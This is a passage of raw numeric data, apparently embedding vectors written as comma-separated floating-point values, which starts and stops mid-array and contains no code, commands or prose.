,-0.0031917917,0.015003397,-0.008336454,0.005392008,0.0039201975,-0.007289451,0.0054884413,0.002243129,0.0038439527,-0.00838558,-0.003489368,0.0031651508,0.00396059,-0.024035329,0.011234039,-0.017257906,-0.0009971515,-0.021588482,-0.019859718,0.0035828373,0.0019113733,0.012720031,0.00050662505,-0.004625156,-0.00727704,0.010508007,-0.011752789,-0.0061375885,0.04059241,0.009162641,-0.029250892,0.011645418,0.0135370735,-0.014393492,0.06934756,0.006193138,0.014804712,0.022478098,0.0039018078,0.017607186,0.012594117,0.017251404,-0.0061309324,-0.0056329896,-0.0027020164,0.017221088,-0.00464174,0.015583383,0.0069835084,-0.0031966285,0.037285224,-0.0026238293,-0.0031159571,-0.004364807,-0.0034600745,0.012707783,0.030322151,0.00019499553,-0.0027543574,0.016510585,-0.016188242,-0.0016941001,0.02277168,-0.012807601,-0.018324712,-0.0037358196,0.023507368,-0.002175073,-0.02092607,-0.049698178,-0.0017188936,0.15377368,0.009413293,0.002941783,0.02810351,0.002502422,0.00941908,-0.08913127,0.019476047,-0.0069523696,-0.0036068875,-0.0016790411,-0.004047986,-0.016547304,0.02145091,-0.0078122104,-0.005929976,0.0060218046,-0.013969506,0.015679503,-0.016141752,-0.007396605,0.010133371,-0.012931869,-0.010968218,-0.034246203,-0.0017863765,0.020181682,-0.0012695513,-0.004811642,-0.024278581,0.0013725478,-0.01825334,0.01408552,-0.011757224,-0.016834484,0.021471443,0.015186972,0.013735974,-0.0007200017,0.0063540167,0.01986298,0.019099882,-0.0097839665,-0.04358563,-0.14724332,0.015959635,-0.010981066,-0.031085864,0.020254206,-0.010860153,0.00580441,-0.008736484,0.015979454,-0.0063483096,0.012232257,0.006416366,0.0024007573,0.016469048,-0.01562409,0.0067269765,0.009881781,-0.01662599,-0.008128526,0.0025320684,0.02447089,0.005511044,-0.00031994595,-0.027936848,-0.023077574,-0.00715222,0.015250006,0.020548508,-0.018735249,-0.00020274466,-0.014735134,0.02042914,-0.018676383,0.007453761,0.012990909,-0.03443076,-0.0110164555,0.0044485815,-0.0069252066,0.017606901,-0.00686706,-0.009928291,0.004235892,-0.0027261742,-0.007678608,0.010665553,0.0019562757,0.008031864,0.019367248,0.009680954,0.012819898,0.010207865,-0.012526412,0.0063983393,0.001180434,0.010156587,-0.00431849,-0.03294274,-0.014380516,-0.0042632692,0.0058931476,-0.04579648,-0.0005581003,-0.009366009,0.039637312,0.00022016453,0.01970909,-0.023774711,-0.0074816,0.009496573,-0.007343038,0.0048493347,-0.004636667,-0.013516974,0.01159924,0.002520498,-0.013845978,0.018492227,0.018683136,-0.01357011,-0.00300274,0.007453304,-0.005254977,-0.0066150003,0.020611964,-0.011445812,0.0018208119,0.00852488,0.008031596,-0.014829904,0.015560395,-0.012115023,0.023250403,0.0090261,0.027320212,0.0019399808,0.048081588,-0.012436798,-0.017796386,0.02857383,-0.0031429913,-0.025197275,-0.02799603,0.002543727,0.00001013149,-0.007863874,-0.01746363,-0.012266085,-0.00996029,-0.010693471,-0.015796434,-0.0060128663,0.013531632,-0.0039613624,-0.02638323,-0.030252872,0.013118105,-0.010881772,0.011025213,-0.024489526,-0.0071405675,0.00328297,0.009604665,0.033345614,0.04050224,0.050674524,-0.005851828,-0.024624407,-0.0059704953,0.015647473,-0.02756934,0.0084280325,-0.012608495,0.008835855,-0.027658982,0.003669778,-0.020256719,0.00042686323,-0.051412933,-0.02282408,-0.002250874,-0.015006263,0.0075245565,0.004461078,0.02911765,-0.022671366,0.03611195,0.0075983056,0.016653538,-0.008502956,0.0003101888,0.034376998,-0.0084624,-0.013173706,0.03134325,0.057448104,0.0030869104,-0.0142829865,0.0000739969,-0.0019013978,-0.003460099,0.014862071,-0.014529821,-0.022014825,0.0058534998,-0.02281982,-0.008720823,-0.012018479,0.0012394604,-0.017349783,0.02267432,0.0062617655,0.010352553,-0.010359657,0.01336844,0.015910689,-0.0068846773,-0.016483372,0.021128722,0.0077252053,0.008977569,0.023016894,0.015727974,0.002257166,0.010342203,-0.009327717,-0.018750498,0.008748785,-0.0002139905,-0.00008117297,-0.04712795,-0.0020510475,0.0076127085,-0.008690625,0.011523684,-0.0089360345,0.028824132,-0.001127888,-0.012630706,-0.013302817,-0.0078114877,-0.008695678,-0.022190707,0.017292332,-0.011602528,0.006312368,-0.011958213,0.0124821225,-0.014605842,-0.012009355,-0.009309092,0.0064710984,0.0004344458,-0.018069291,-0.0153984595,0.0040365723,-0.012698031,-0.030531095,-0.020739157,-0.020017076,-0.015716761,-0.029204328,-0.00710782,-0.007411009,0.011201554,-0.019345755,-0.020721775,-0.022790207,0.0014589891,-0.004546118,-0.009689941,-0.0023083007,0.0016115602,0.00017730774,0.017971903,-0.022042172,0.0320896,0.0044208025,0.00078482257,-0.007302854,-0.051690336,-0.0078554265,0.04388144,-0.02218608,-0.00394134,-0.0019437654,-0.01183357,0.027233332,0.00944362,0.014859484,0.01601054,0.03506003,0.0034155643,0.040204626,-0.008574248,0.010973843,0.014312354,0.016697364,-0.025391953,0.0072107273,-0.023918018,-0.0037518912,-0.018108811,0.01176707,-0.019060792,0.0011165483,-0.0013057089,0.01813336,-0.011560458,-0.014328175,0.01202059,0.0041492227,0.028520098,0.020119127,0.012133339,-0.005916293,-0.0005843759,-0.0068777786,-0.012980347,0.0061356025,-0.021274306,0.014233709,0.008676487,-0.004809585,0.022211388,0.018605594,0.03610963,-0.016757673,-0.0012431471,-0.017716995,0.008237403,0.009601201,-0.003080111,-0.0030588894,0.039713338,-0.037821528,-0.015098242,0.013071871,0.02048763,0.008984702,0.0014856047,-0.0043949056,0.0021550092,-0.0011573889,0.0003637355,-0.020057026,0.021693513,-0.0064639985,0.0055575846,-0.007561725,-0.003607381,0.0035878217,-0.0157015,-0.016627882,-0.00059924286,0.009086491,0.02684907,0.014453207,0.0012618784,-0.014957929,0.017981987,0.04480638,-0.0053612962,0.013903275,0.0013334819,-0.005859108,-0.0064177923,-0.0074715586,-0.013187488,0.0063887974,-0.009172698,0.014841968,0.0258893,-0.015952481,-0.023475487,0.017274162,0.001992391,0.0034852817,-0.023850387,-0.0035149294,0.021500004,-0.0028707364,0.013228167,-0.014803299,-0.009070582,-0.016226467,-0.021986414,0.012982762,-0.004511859,0.02571282,-0.010310478,0.008765806,0.0042037703,0.018744817,0.010880307,0.00062126294,0.043752585,-0.023100905,-0.017934343,0.013740746,-0.0037757293,0.020729806,0.0026327167,-0.00645014,-0.0076580765,0.00022540416,0.004973913,-0.011752953,0.00046669017,-0.0073210555,-0.028813563,-0.014397495,0.022417685,-0.0069338386,-0.021767832,0.011677105,-0.018924583,0.0033538977,-0.0023357202,-0.0061508487,0.003982724,-0.019422453,0.068876505,-0.0041158623,-0.0099647045,-0.0110639855,0.025410663,0.019809777,-0.0022709828,0.016237259,-0.011734991,-0.015271028,-0.030426187,-0.027854647,0.010306309,0.0108536845,-0.023889365,-0.019820608,-0.0050313678,-0.004188469,-0.013146828,-0.0040642587,0.0112379175,0.0011357352,0.03007098,-0.011868755,-0.018452112,-0.05412744,0.0008170713,0.004431961,-0.031109773,0.0075263036,0.020823421,-0.004293956,-0.02193869,0.0057040276,-0.025009654,0.0013656117,-0.0047354195,0.012137439,0.009998835,0.007516023,0.033172786,-0.0022423516,-0.014723811,-0.009276864,0.0074161864,-0.013882355,0.009942348,-0.011973859,-0.00075776316,0.0005988588,-0.011947293,0.014995316,0.023749582,0.014537192,-0.01265979,0.011316092,0.0052198353,0.0034599698,0.013286756,0.0041646096,0.0056832856,-0.012736584,-0.028348396,0.0010973018,0.010802454,0.032860506,-0.006343345,-0.0063862544,-0.016079795,0.000107815904,-0.033034313,0.013234801,0.0035432891,0.010424905,-0.010721123,0.003448897,0.0044108564,0.0064090686,0.014154805,0.0025604335,-0.017906541,-0.0026686066,-0.0025797973,-0.020644719,-0.0016593467,0.027294911,0.005648511,0.030778613,0.002033732,0.022503385,0.04296947,-0.01916734,0.026653666,-0.02598923,-0.006662476,-0.0010213549,-0.007849467,-0.021342602,0.031560685,-0.028130908,-0.019562759,0.0029698145,0.004285483,-0.007961579,-0.023182869,0.0062446585,-0.049073007,0.031018121,-0.019303167,-0.02217255,0.006084472,-0.017678889,-0.0056397696,0.04128134,-0.011545186,-0.044565313,-0.005277364,0.020486064,0.018540295,-0.016599383,-0.0036531843,0.0015717602,-0.01549247,-0.021290414,0.014086016,0.002713799,0.030339863,0.004404605,0.004695778,-0.02360891,-0.006417159,-0.0024618853,-0.0115085775,0.014516939,0.0041686464,0.003234402,0.0047601582,-0.002596577,0.0071993545,0.022900319,-0.0041046576,-0.008859173,-0.022768363,0.0069187847,0.006244852,0.012501402,0.0035849917,-0.0038736938,-0.002445088,0.0021907387,0.02400139,-0.00058800715,0.008960502,-0.0018186619,0.007940226,0.037612498,-0.02324849,-0.022738097,0.015369518,-0.022968685,0.0140282065,-0.023504121,0.00579196,-0.010024834,-0.00010294626,0.004786336,-0.022812046,-0.013113932,-0.005872425,-0.008348212,0.0003786549,-0.005185518,0.0044198306,-0.015724787,-0.028814709,0.003729425,-0.018156316,-0.0059475484,-0.0022813743,-0.008345483,0.00028599956,0.011760756,0.022540674,0.014178558,-0.014492052,0.015251548,-0.03261663,0.011551803,-0.0005065105,0.020260211,0.006692578,-0.018477876,0.01344671,0.016884115,-0.004119607,0.013153618,0.010701604,0.01242732,0.00082921155,0.011790476,-0.015020015,0.01193299,-0.0006540597,0.009524331,0.010093441,-0.016525868,0.008401805,0.0016201765,-0.0020434626,-0.008070072,-0.0929258,-0.018020961,0.01643986,-0.006761004,-0.0026883562,-0.0025092808,0.03384375,0.006775682,0.02333934,0.011889296,-0.021888044,-0.0051302174,-0.02233986,-0.01229783,0.004313298,0.0044844216,-0.026999256,0.0068116016,0.01140881,-0.00525517,0.00088901,0.0035276148,-0.014948863,0.010209761,0.0022552763,0.02076815,0.017039988,0.042706616,0.010589322,-0.020076033,0.0039124642,0.02407297,-0.0254189,0.0053945994,-0.02495349,-0.0074945646,0.019637413,-0.0045847096,-0.007724806,-0.00018547499,0.008840033,0.010474191,0.0072911936,0.017509779,-0.002526783,0.017700585,-0.0020443941,0.029738985,-0.008775429,0.017473105,-0.006560135,-0.0112838,-0.009137412,-0.0068310616,-0.026695253,0.00013593222,-0.005140432,0.024465468,-0.019439112,0.0016911642,-0.01884997,-0.018638404,-0.0142152505,-0.007246795,-0.026130587,0.024927473,0.012889058,0.026020598,0.023017755,0.0031195702,-0.012741326,0.020480303,0.0014301728,-0.0092214,0.035388783,0.008999022,0.009728197,0.025254384,-0.020411056,0.01048648,-0.0075401166,-0.035715535,-0.0049380073,0.020745689,-0.034601726,-0.0053998637,0.0043886,0.016679041,-0.010638486,0.019619755,0.014481452,0.015105223,-0.010014166,0.030959735,0.009483538,0.0373414,0.03711683,-0.0114693185,0.0151221445,-0.0065063657,-0.003290043,-0.020293972,-0.0060121156,-0.0048320657,-0.02374908,0.030588223,0.002931143,-0.027676268,0.0022639816,-0.0019975437,0.020496985,0.017830085,-0.03383493,0.0037071446,0.010264442,0.0075616385,-0.011799251,0.0121218525,0.014224651,-0.012383855,-0.0047952775,0.0152861755,-0.0036908495,-0.019975645,0.0057764063,-0.027298516,-0.027414342,0.025328826,-0.00025607264,-0.014632642,0.0047442173,0.0007191228,0.019997448,-0.010923663,-0.0033882752,0.010729192,-0.0061780117,0.0067649866,0.004401779,-0.0049908687,0.0016557096,0.014421426,0.011283867,-0.019121725,0.031584322,-0.0068973196,-0.009471004,-0.030575609,-0.011895189,0.021436075,0.019401478,-0.016065996,0.026084775,-0.009017866,0.0025340612,-0.0015282668,-0.00352345,-0.0045351763,-0.0014983788,0.01720092,-0.007626654,0.035533838,0.012212177,-0.0018666615,0.0074987393,-0.008226313,-0.010841935,0.013464959,-0.014601041,0.010225528,-0.015668262,-0.017627455,0.00679305,-0.06828756,-0.010441558,0.0018011311,0.011129274,0.03513268,0.020226752,0.027256012,-0.018427752,-0.006219392,-0.0091795195,0.0042591514,0.003375887,0.017133232,-0.009427846,-0.0084336465,-0.018636703,-0.005166078,0.023422245,0.01887261,-0.0017555561,-0.0057955356,-0.0017694173,0.0065893074,-0.005076857,0.0029051574,0.01874093,-0.0045064134,-0.027366754,0.009681295,0.00477493,-0.03465197,0.025038857,-0.015605194,0.0022753517,0.060691364,0.019259581,-0.0165895,-0.012227562,0.009913476,-0.037362408,-0.0073127113,0.003906897,0.027844382,-0.012198675,-0.01715192,0.009537979,-0.003618755,-0.013795842,0.001863188,0.0013921513,-0.003116911,0.0035873337,0.030910067,0.019484458,0.017264493,-0.017585717,-0.014930381,-0.0034500253,0.009402357,-0.01151539,0.0050734608,0.008068482,-0.015868112,-0.00012806038,0.007905253,0.0055638147,0.0003851043,0.013398808,-0.010615079,0.030499639,0.01694127,0.0119376145,0.021987988,-0.0061670295,-0.00911546,0.018203972,0.04553201,0.008371288,-0.011409755,0.00018899898,-0.0060793688,0.011238051,-0.0019426022,0.015072164,0.010839445,-0.01793741,0.012429439,-0.03687341,-0.011106495,-0.03224308,0.0017031642,0.008131229,0.03208676,0.0071682567,-0.028891837,-0.008877915,-0.014564462,0.0078089675,0.0030719307,0.010170431,0.022106826,-0.007925817,-0.01346652,0.0072522005,-0.014034382,0.008668915,0.009698926,-0.019884607,-0.0077414154,-0.019950703,-0.0038092157,-0.010842748,0.033195823,0.010863528,0.00052808295,-0.0029163603,-0.0020223313,-0.011069519,-0.004072408,0.0016853554,-0.01062029,0.007720054,0.0012556082,0.013616709,-0.023670599,-0.016714305,0.0025843016,0.011593871,-0.0006098961,-0.024376871,-0.001698817,0.006130744,-0.0072014136,-0.008532145,0.019677674,-0.011228195,-0.010183202,0.016686177,0.013615427,-0.013488338,0.017295847,-0.015286502,-0.0036382566,0.0010513819,0.009210989,-0.017304784,-0.0028717997,-0.00050963863,-0.021375526,0.01590114,-0.0125146285,-0.0050641056,0.00052622403,0.018475993,0.017839117,-0.012998254,-0.021089844,0.013566772,0.034776982,-0.011931949,-0.009049315,0.010676996,-0.010536632,-0.0052386164,0.03121154,-0.015258723,0.0031880464,-0.01785958,0.0102963345,-0.007590374,-0.020538237,0.018386377,0.012041006,0.003248586,-0.018244334,-0.0025102426,0.002606341,0.025970578,0.0057959296,0.0051755523,-0.001064728,-0.0020347305,0.015120493,-0.03995278,0.004675761,0.0041994555,0.025908114,-0.03656076,0.022242611,-0.007185746,-0.015549473,0.01149756,0.0035999033,-0.015183633,0.007370192,-0.015156002,-0.009582967,-0.005944632,0.012789375,-0.024033168,-0.026835356,-0.011804165,-0.09573581,0.024313862,0.0030954147,0.010460218,0.033304155,0.0000578675,0.0002530717,-0.008418213,-0.011660336,0.015977224,-0.0059347562,-0.01343231,-0.004917004,-0.0063267066,0.0127298,-0.017727284,-0.001271885,0.0027018697,0.0054413592,-0.008829758,0.00028420502,-0.009051382,-0.0050535183,-0.0011227323,0.012758204,0.012179991,-0.003910692,-0.009422088,-0.00075805833,0.004167482,0.00074389833,0.007398499,-0.005492696,-0.0005697756,-0.032671552,0.0024644448,-0.0050291936,-0.0057307016,-0.008929705,-0.0056591337,0.016417572,0.0057521863,0.018828684,0.02718195,-0.020921908,0.01728287,-0.016285736,-0.008421241,-0.014727199,-0.009391521,0.004458092,-0.005649861,0.024766065,0.030296631,0.03116534,-0.0031617377,0.00081264036,-0.0011672016,0.039785553,0.0015140643,-0.0073739635,-0.0025436962,0.014299001,0.018463032,0.0028151853,-0.014112691,-0.0009111447,-0.0019403786,0.00040738584,0.015287381,0.0019948226,-0.019033002,-0.014344608,-0.009066106,0.010424373,0.011294362,-0.0063545858,-0.012450694,-0.008845741,-0.011125699,0.026307683,0.00362534,0.030845823,0.011144754,-0.010749276,-0.0057164067,0.0008304718,0.007733962,0.007829216,-0.006389684,-0.0121103255,0.0068889405,0.016283052,-0.0007411412,0.021848777,0.0057282895,-0.01917175,0.00012346581,-0.02016233,-0.0010319987,-0.016892958,0.016944874,-0.0071704607,-0.010560202,-0.020155685,-0.021047316,-0.013389936,-0.0038207485,-0.011836804,-0.014655325,-0.016129864,0.023392713,0.030064123,0.015602777,-0.0011514685,0.015625954,-0.011756454,0.0005979919,-0.026647398,-0.022914037,-0.036127035,0.0077315047,-0.011158969,0.014381004,0.0052630734,-0.0012292891,0.005588801,0.010922079,-0.038467642,0.0178229,0.0016963504,0.0046984036,-0.0017805565,0.030021038,-0.009682629,0.006489266,-0.018388953,-0.015195868,-0.004693993,-0.0034508118,0.010083539,-0.017114323,0.017655008,-0.005649325,-0.017968021,0.019125765,0.005884473,-0.024705438,0.012213234,-0.018049156,-0.02031206,0.00935769,-0.019152932,-0.0033513738,0.011378566,0.0002520032,0.02374962,0.017908238,0.0028125853,-0.027702995,0.006311239,0.021612642,-0.000089697365,0.009951419,-0.023693716,0.0033303802,-0.01020865,0.01430731,-0.03210555,0.0058928346,-0.024507727,-0.010516434,-0.004047947,-0.008741235,-0.016471405,0.0008436989,0.032624632,0.036268204,-0.0025936887,0.0023790179,-0.039636746,0.014036056,0.0012570402,-0.0153365005,0.012801449,-0.0054987697,0.0063151564,-0.013431218,0.014612458,-0.026529992,0.015214421,-0.007937393,0.0048445235,-0.012752755,-0.004001536,-0.021513082,0.0003184459,-0.006567041,0.00046440156,0.017005157,0.0014361268,0.014980339,-0.014382386,0.0108348895,0.039987,0.03168345,-0.01627697,0.01751793,-0.009340766,0.0007194268,-0.00020182625,0.016975913,0.015820224,0.09786562,0.00090608007,0.0042799646,0.0047759814,0.016541101,0.006931821,0.016714342,0.009858253,-0.010841158,0.0018344711,0.0042985193,-0.009582747,0.0044515925,-0.010828332,-0.0054005226,0.018074866,-0.0023310105,-0.01727998,0.017137809,0.017818276,0.009215867,-0.015933145,-0.010199075,-0.038384896,-0.0030420509,-0.07261436,0.022327254,0.010926998,0.000117229334,0.02754676,0.0012633454,-0.0057480964,0.026061242,-0.012184162,0.014531941,-0.0012231747,-0.002352456,-0.023299621,0.00240916,0.015601624,0.023758482,0.012332715,0.011761607,-0.00029400503,-0.029478878,-0.0034437475,-0.0017575222,-0.012473658,0.016931018,0.00021023136,-0.004689647,0.015571594,0.018149914,0.012255194,-0.000105414125,-0.00016392012,-0.0018681278,0.005324605,0.0040380033,-0.007859298,0.036364723,0.0034440903,0.0014268071,-0.0069509675,0.015196024,-0.023831207,-0.0008064979,-0.0034079428,-0.029380621,-0.00982806,0.017731981,0.008807957,0.017938733,-0.0025580854,-0.00052094285,0.017736746,-0.015225765,-0.0062128697,-0.009743394,-0.024957944,0.013059379,0.0039077536,0.016573917,0.02756464,0.002073248,0.0029672715,-0.022089299,0.0011745407,-0.0008662173,-0.005401684,-0.014857555,0.01336047,0.017578334,0.01673913,-0.0041501904,-0.007287801,0.014585129,-0.015906973,-0.002439914,0.011947966,-0.0125449505,-0.024657259,-0.007668995,-0.012079172,0.014436973,0.0014361006,-0.0009885576,0.036408048,0.013145945,-0.009294231,-0.007925769,0.028444089,0.015849657,0.0151534425,0.014088888,0.037193254,-0.031191168,-0.010616345,0.0021494108,-0.0192476,0.0055144415,0.019133741,0.020434884,0.046552796,0.004098541,0.020327574,-0.0075972015,0.013890333,-0.007199289,-0.005038279,-0.010781981,-0.025142485,-0.012327416,0.041361164,0.00035215734,-0.006324192,0.033039168,-0.005309842,0.008285818,0.01875318,0.0129502155,-0.016565958,-0.0008348874,0.017033031,-0.0020906245,-0.0126114385,0.039314624,0.0025233724,0.023826517,-0.00021401608,0.003686392,0.0048386576,-0.0009029649,-0.011065627,-0.002275343,-0.014589812,-0.00800421,0.015269792,-0.01229798,-0.021898095,0.019787213,-0.009193875,0.01277405,-0.039389327,-0.008414354,0.013926586,0.0010677478,0.009697785,0.0011219223,-0.0044551888,-0.0072020474,-0.006036355,0.008583199,0.021108985,0.009607405,0.011336502,0.00654025,0.015414044,0.00022281964,0.014036843,0.022960734,0.008180006,-0.012998422,-0.014290966,0.009445969,-0.009136265,0.0066277296,-0.0035259828,-0.025921296,0.01397831,0.011719155,-0.0026560256,-0.0067745917,0.01298656,0.0009481748,0.015895411,-0.020173041,0.00431901,-0.014397077,-0.02793096,0.004014702,0.009440643,0.00033577022,-0.017453013,-0.0040737274,0.0063608023,0.012828428,-0.016120402,0.0019179503,-0.01802315,0.027425937,0.0026935337,0.009535754,-0.010305171,-0.009264313,-0.014874706,-0.0018368236,-0.0138683645,-0.02618399,-0.017225152,-0.00025099202,0.0054511367,0.019371081,-0.0005048172,-0.014873903,-0.00054919,-0.01391342,-0.00015138222,0.0067710155,-0.025916215,0.0062292228,-0.0013993938,-0.0017190872,-0.017291453,-0.03346306,-0.02626014,0.011957333,0.0059435507,0.014132985,0.014116602,-0.014839396,0.006284025,0.010366353,-0.019997556,-0.0047684363,0.00066637574,-0.015036692,-0.010221494,-0.00015362947,0.00011367705,-0.0086433245,-0.0017232206,-0.023277527,-0.012245294,-0.0099558635,-0.023553489,-0.0045067756,0.0075551746,0.02873735,-0.015880486,0.008934702,0.0059630293,-0.0025939213,0.026913745,0.010946555,-0.0052600647,-0.0050833947,-0.007254006,0.0016603636,-0.010012978,-0.010102439,-0.0062004877,-0.008754622,0.010950031,-0.0018697057,0.018728815,-0.0093388185,-0.023227884,-0.0062121134,0.011061215,0.009779417,-0.027148174,0.017230444,-0.027010946,0.015598797,-0.032600056,0.011799258,-0.0058825854,0.07130956,-0.04205189,-0.01286588,0.025106464,-0.00076488766,-0.011614153,0.011300887,0.012406975,-0.034335673,-0.007442981,0.01644164,-0.0030947372,-0.0116799455,-0.020828154,0.00082016643,-0.0037926831,-0.017650597,0.013258464,0.016038012,0.0045767887,-0.012696345,0.012382898,-0.0019429548,-0.0005708275,-0.0111762425,-0.0050076703,-0.001128514,-0.005106522,-0.006445925,0.011849947,-0.002586853,0.019514853,0.04184153,-0.020504963,-0.0027391687,0.005931847,0.004367794,0.019335931,-0.0010421417,-0.033088163,-0.025048178,0.0017892312,0.002454192,0.014624409,-0.0062749353,-0.021891678,-0.012986365,0.0006969635,0.0010523087,0.14042744,-0.025415406,0.008941874,-0.009310516,0.0019632187,-0.0057962653,0.029738726,0.02600807,0.0004035013,0.0055411053,0.018681645,0.009984,-0.0013740318,0.02249725,0.0065500564,0.012863785,0.004291241,0.16795427,-0.0032169998,0.0135292625,-0.0029344424,-0.00887228,-0.00017719269,0.006201464,0.00424303,-0.07074284,-0.011992803,-0.022659238,-0.03233053,0.014532716,-0.017364852,0.023152173,0.0065373206,-0.0061101234,-0.014345471,0.013822087,0.015706988,0.017843027,-0.017879087,0.011551777,0.0044089276,-0.001125719,-0.008148452,-0.013958734,0.009645718,0.022300689,-0.031004822,-0.009551214,0.005957423,0.046041425,0.008707328,-0.016040176,-0.003649683,0.010668115,0.013456659,0.010372093,0.011025219,0.0071770595,-0.05234254,0.02811156,-0.007545505,0.038746845,-0.004879612,0.04873639,0.002829135,0.007975168,-0.005115052,0.00989763,-0.01149292,0.012833854,0.006191972,0.0037783955,-0.014924619,-0.012564233,0.058392063,-0.00057255465,-0.019029133,0.008959612,0.01000686,-0.005173313,0.028825372,-0.00035887162,-0.015635973,-0.020767372,0.0047725732,-0.022694837,-0.014442926,0.008658396,0.029331,-0.0067230035,-0.01177278,0.01617766,0.00084664446,-0.00024047219,0.028933253,0.02075445,0.008950615,-0.0042782375,-0.019864138,-0.025721543,0.004500343,0.017636945,-0.015423757,-0.00397284,-0.0035039615,0.008921517,-0.015071823,-0.021426393,-0.009879958,0.005422317,0.032326743,-0.003818787,-0.010127841,-0.0021687532,-0.010214151,-0.0036562688,-0.026011696,-0.011338898,-0.044589862,0.0029279871,0.0038892592,0.0023134793,0.0054859556,0.014637863,-0.018040005,-0.0025982668,0.016815057,0.00056540576,-0.017045567,0.005144239,0.0024727366,-0.008659287,0.004023816,0.05296382,0.00014675967,-0.017430631,-0.009343008,-0.037123717,-0.028442021,-0.011374931,0.012458787,0.026651211,0.013189161,-0.0068319687,-0.008326138,-0.008783314,0.019899255,0.0035208892],[0.0129827615,0.007851594,-0.0048787734,-0.014286845,0.012526137,-0.0061868443,0.0029055953,0.028424826,0.007974172,-0.022068577,0.023355568,0.01380263,-0.009426152,-0.01909368,-0.0036888595,-0.010044814,0.02107088,-0.012789773,-0.012867007,-0.014759258,0.010413132,-0.0013514544,0.019205675,-0.011547244,0.0482859,-0.00025923218,0.006419704,-0.014885916,0.0065475483,0.004384675,-0.001553808,0.03802658,-0.011771055,0.0030201767,0.022399282,-0.01872081,-0.016295047,-0.010174002,0.020365655,-0.0026624904,-0.004095366,0.011598209,0.010624412,0.018578844,0.0020002488,0.005441844,0.0002922547,-0.013879478,-0.036919806,-0.009732347,0.021148369,-0.0014926342,-0.01651818,0.005677516,-0.013668485,0.018685559,-0.015022439,-0.03802908,0.01936263,-0.022799602,-0.01055392,0.015895728,0.007867867,-0.019633474,0.042525455,-0.017148111,0.008956739,-0.034525827,-0.018810917,-0.01168015,-0.022650491,-0.0016937423,-0.018737251,0.023851447,-0.014002255,0.0058436207,0.010605443,-0.011233291,-0.008016364,0.022951424,-0.013854992,-0.0028328376,-0.0014493314,-0.003171615,-0.001545757,0.01068613,-0.012030058,-0.0044252127,-0.009213626,-0.014969183,-0.02735431,-0.010545161,0.010415066,0.011561231,-0.010123304,0.026606869,0.011484242,-0.009625896,-0.0092310775,0.030284207,-0.001941514,-0.021759577,-0.0049329163,-0.0013530079,-0.007073403,-0.015696108,0.0077214865,0.003039335,-0.009956684,-0.005551945,0.022638513,0.0018700543,-0.016745055,0.008863288,0.0042381054,0.011703944,-0.0048131943,0.0021253338,0.0047464767,-0.028942479,0.024454823,0.025694393,0.018984385,0.03435461,0.00034436112,-0.021240786,-0.0075314655,-0.0038636976,-0.0056763114,-0.01376305,-0.0024159604,-0.0071463673,-0.0075035957,0.00259341,0.0030635598,-0.011504309,0.01204524,-0.009099576,0.0040464792,0.010887035,0.011661969,-0.009647116,-0.0001287674,-0.0020615445,0.026634527,0.008326961,0.009959262,0.013932901,0.028025243,-0.007993304,-0.0030246335,-0.021846551,-0.0016058648,-0.015843298,0.016404971,0.023314321,0.0010200158,-0.02106377,-0.014127325,0.019495303,-0.007172844,0.01960232,0.017232152,-0.011688865,0.0009156186,-0.024392633,-0.011896974,0.0067131403,-0.023700017,-0.01354513,0.012830577,0.005136445,0.012384247,0.0093315225,0.0063867234,0.0170014,-0.0041779145,-0.015570906,-0.004593906,0.0018356787,0.017297847,-0.0038322406,0.009600173,-0.00022927656,0.00035950978,0.02540586,0.030523285,-0.0006886966,-0.011194062,-0.016791599,-0.006037374,-0.015235568,-0.015432348,-0.009618003,-0.019985702,-0.018133894,-0.008595923,0.0734368,-0.01978876,0.007983615,-0.0008700903,-0.0116837965,0.0020547453,-0.029380223,-0.009160666,-0.029768365,-0.0074781305,-0.011930945,0.018594546,-0.012954718,0.012484242,0.0011323284,-0.010330823,0.012272106,0.0022348175,-0.039568186,0.0006616455,0.016714057,0.027980523,0.02531106,-0.0065325038,-0.008733937,0.01998081,-0.016356817,-0.009057532,-0.008874903,0.00114046,0.0013750943,0.028109496,-0.030365197,0.012159166,-0.012983132,-0.006444934,0.016827727,0.030806331,-0.0074305753,-0.012856743,-0.0035673068,-0.0075482903,-0.0093273325,0.005036109,-0.009330722,0.021495478,0.040404074,-0.0077510653,-0.0038970548,0.013550638,0.0036211745,0.007101377,0.021642985,0.0128014805,-0.0061095976,0.032893047,0.01785522,0.000832932,-0.016936807,0.009610654,-0.00692773,0.0015704709,0.007229952,0.024605166,0.021171398,-0.029069766,0.036629744,0.037876725,0.013612451,-0.003714469,-0.039520193,-0.0019819434,-0.022054203,-0.0156894,0.01164708,-0.010513126,0.0026442443,0.029073263,0.008026642,0.0098728305,-0.002337054,0.010784999,0.0047226227,0.0026674983,-0.009957501,-0.010157891,-0.009725065,-0.009966045,0.0003598224,-0.01331475,0.00025861242,0.025296481,0.011239398,-0.04055172,-0.008646009,0.027541427,-0.005560535,-0.037402857,-0.014732363,-0.015733894,0.0231523,0.0039405287,-0.0086190505,-0.004865822,-0.010276222,0.0075763515,0.0006521797,0.00094592175,-0.0013865567,-0.024717113,0.030803334,-0.021236578,0.021855244,-0.0433935,-0.02508949,-0.006871254,0.018584495,0.00097651,-0.0009176982,-0.011228902,-0.0139605645,0.0033513855,-0.006838933,0.02444456,-0.024888054,0.018842548,-0.006072138,-0.021623636,-0.00038657757,-0.0011027546,-0.014355145,0.0060072723,0.016740855,0.0012129677,0.017082585,0.03128985,0.010573697,-0.012655751,0.012441958,0.0004565256,0.008317558,-0.011418272,-0.0048214593,-0.008413901,0.0089800265,-0.004679791,0.0051028044,-0.00057901174,-0.018116845,-0.0059206584,0.0028869014,0.007509441,0.012374729,0.021697331,-0.00007400731,0.001646814,0.0083156135,0.011790827,-0.021127576,0.0013251307,-0.026161227,0.00023901167,-0.0007821861,-0.0026818307,0.022913277,-0.010515713,0.0097879255,0.0532533,-0.0013360447,-0.0024398312,0.026023367,0.029975405,-0.01215064,0.037281185,-0.018722506,0.022448651,-0.011029669,-0.0049906364,0.011288237,-0.0014562133,0.0063442355,-0.019118484,0.027313884,-0.03960517,-0.025985388,-0.025067339,-0.019197319,-0.004077449,0.0090236,-0.007932908,0.0032582616,0.019191457,0.0054283636,-0.00042515478,0.01323827,0.0075570727,-0.027833762,-0.004942539,-0.0036672438,-0.0007422475,-0.0011678517,-0.038142387,0.034975022,0.0202942,-0.010203035,-0.006639899,-0.006816493,-0.022584539,0.024368936,-0.014404811,-0.011762081,-0.009754849,0.024450103,-0.0037636696,-0.0049532563,-0.015494744,0.01246561,-0.0023495592,0.037140362,-0.024170943,0.003670394,-0.009150378,0.009210999,0.02871881,-0.017555686,0.039463706,0.033227686,0.018213732,0.028518764,-0.01